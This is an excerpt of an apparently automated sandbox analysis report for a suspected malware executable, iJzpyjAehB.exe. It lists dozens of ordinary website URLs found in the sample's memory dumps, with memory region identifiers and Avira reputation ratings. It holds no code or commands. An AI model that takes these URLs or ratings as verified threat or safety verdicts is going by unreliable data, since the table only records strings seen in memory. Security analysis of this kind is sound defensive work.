                                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                                      http://www.valselit.com/177-appartement-a-vendre-sigean-30378iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                                      https://www.com-sit.com/wp-content/uploads/2019/01/BOX_Home-ACTIVATION_2019.jpgiJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                        high
                                                                                                                                                                                                                                                        http://www.myropcb.com/why-use-myro/iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.300368242.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.439075116.0000000008E00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.596543130.0000000003910000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.467548512.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.440284917.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.460052279.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                                        http://www.pcgrate.com/wp-content/themes/dt-the7/js/main.min.js?ver=9.12.0iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                                        http://gholographic.com/iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                                        http://pohlfood.com/wp-content/plugins/wc-product-table-pro/assets/css.min.css?ver=2.1.0iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                                        http://www.com-sit.com/wp-content/themes/betheme/js/plugins/chart.min.js?ver=26.6iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                          high
                                                                                                                                                                                                                                                          https://www.ora-ito.com/iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296941579.0000000009100000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.596543130.0000000003910000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297881797.00000000031D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.467548512.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.440284917.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                                          https://tickets.suresupport.com/faq/article-1596/eniJzpyjAehB.exe, 00000000.00000003.278941119.0000000003570000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.275586647.0000000003570000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.421181826.0000000002540000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.278509190.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.274065414.0000000003600000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.275803176.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.272483964.0000000008700000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.274386745.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.277227725.0000000003570000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.423509233.0000000000A60000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                                          http://www.indonesiamedia.com/wp-content/themes/mag-theme/style.css?ver=4.9.22svchost.exe, 00000016.00000003.496913823.000000000332A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                                          http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.woff?5.10.0)iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                                          http://www.pcgrate.com/wp-content/uploads/the7-css/css-vars.css?ver=899328ee298eiJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                                          http://myropcb.com/login/iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.300368242.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.439075116.0000000008E00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.596543130.0000000003910000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.467548512.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.440284917.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.460052279.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                                          http://www.winhui.cn/template/default/img/fixedimg4.pngiJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.596543130.0000000003910000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.467548512.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.440284917.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.460052279.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438940303.0000000003090000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                                          https://www.com-sit.com/branchen-know-how/iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                            high
                                                                                                                                                                                                                                                            http://www.pcgrate.com/wp-content/uploads/elementor/css/post-1009.css?ver=1677257013iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                                                            http://www.jenco.co.uk/Wpigalicapi.exe, 00000002.00000003.478666450.000000000734F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                                                            https://pohlfood.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fpohlfood.com%2FiJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                                                            https://pohlfood.com/wp-content/uploads/iStock-1031193710b.jpgiJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                                                            https://www.com-sit.com/wp-content/uploads/2019/01/HOME_Slider_05_INDUSTRIES_TELECOMM-300x110.jpgiJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                              high
                                                                                                                                                                                                                                                              http://pohlfood.com/wp-content/plugins/elementor-pro/assets/css/frontend.min.css?ver=3.10.3iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                                                                              unknown
